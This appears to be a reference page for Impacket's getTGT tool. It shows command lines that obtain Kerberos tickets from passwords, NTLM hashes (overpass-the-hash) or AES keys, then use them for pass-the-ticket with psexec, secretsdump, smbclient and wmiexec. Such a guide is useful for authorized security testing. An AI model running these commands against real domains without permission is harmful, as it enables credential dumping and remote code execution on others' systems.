impacket-getTGT

Overview

impacket-getTGT requests a Ticket Granting Ticket (TGT) from a domain controller’s KDC. The TGT is saved as a .ccache file that can be used with other Kerberos-aware tools for pass-the-ticket attacks.

impacket-getTGT <DOMAIN>/<USER> [options]

Authentication Methods

With Password

impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash (Overpass-the-Hash)

impacket-getTGT domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

Full LM:NT format also works:

impacket-getTGT domain.local/jdoe -hashes aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

With AES Key

AES256:

impacket-getTGT domain.local/jdoe -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d -dc-ip 10.10.10.1

AES128:

impacket-getTGT domain.local/jdoe -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f -dc-ip 10.10.10.1

An AES256 key is 64 hex chars (32 bytes); an AES128 key is 32 hex chars (16 bytes). Impacket picks the enctype from the key length.

Using the .ccache File

getTGT outputs a file named jdoe.ccache in the current directory. Set it as the active Kerberos credential cache:

export KRB5CCNAME=$(pwd)/jdoe.ccache

Verify the ticket:

klist

Using the TGT with Other Impacket Tools

Once KRB5CCNAME is set, use -k -no-pass to authenticate via Kerberos:

export KRB5CCNAME=$(pwd)/jdoe.ccache

# PSExec
impacket-psexec domain.local/[email protected] -k -no-pass

# SecretsDump
impacket-secretsdump domain.local/[email protected] -k -no-pass

# SMBClient
impacket-smbclient domain.local/[email protected] -k -no-pass

# WMIExec
impacket-wmiexec domain.local/[email protected] -k -no-pass

The target must be a hostname (FQDN), not an IP, when using Kerberos authentication.

Renewing Tickets

getTGT cannot renew an existing ticket — it has no -renew option and always performs a fresh AS-REQ using the supplied password/hash/AES key. To get a new TGT, just re-run it with credentials. Actual ticket renewal in Impacket is done with getST -renew.

# Re-request a fresh TGT (must re-supply credentials)
impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

Common Errors

Error	Cause	Fix
`KRB_AP_ERR_SKEW`	Clock difference > 5 minutes between attacker and DC	Sync time: `sudo ntpdate -u <DC_IP>` or `sudo timedatectl set-ntp off && sudo date -s "$(curl -s http://<DC_IP>)"`
`KDC_ERR_PREAUTH_FAILED`	Wrong password or hash	Verify credentials
`KDC_ERR_C_PRINCIPAL_UNKNOWN`	User does not exist	Check username and domain
`KDC_ERR_CLIENT_REVOKED`	Account disabled or locked	Account is unusable
`KDC_ERR_ETYPE_NOSUPP`	DC doesn’t support the encryption type	Try a different key type (password vs AES vs NTLM)
`KRB_ERR_RESPONSE_TOO_BIG`	KDC response exceeded the UDP size limit (user in many groups)	Impacket automatically retries over TCP — no action needed

Quick Reference

# Password
impacket-getTGT domain.local/jdoe:'Pass123' -dc-ip 10.10.10.1

# NTLM hash (overpass-the-hash)
impacket-getTGT domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

# AES key
impacket-getTGT domain.local/jdoe -aesKey <AES256_KEY> -dc-ip 10.10.10.1

# Use the ticket
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-psexec domain.local/[email protected] -k -no-pass

Flag	Description
`-hashes LMHASH:NTHASH`	Authenticate with NTLM hash
`-aesKey KEY`	Authenticate with AES key
`-dc-ip IP`	Domain controller IP address
`-k`	Use Kerberos authentication
`-no-pass`	Don’t ask for password (use with `-k`)

​Overview

​Authentication Methods

​With Password

​With NTLM Hash (Overpass-the-Hash)

​With AES Key

​Using the .ccache File

​Using the TGT with Other Impacket Tools

​Renewing Tickets

​Common Errors

​Quick Reference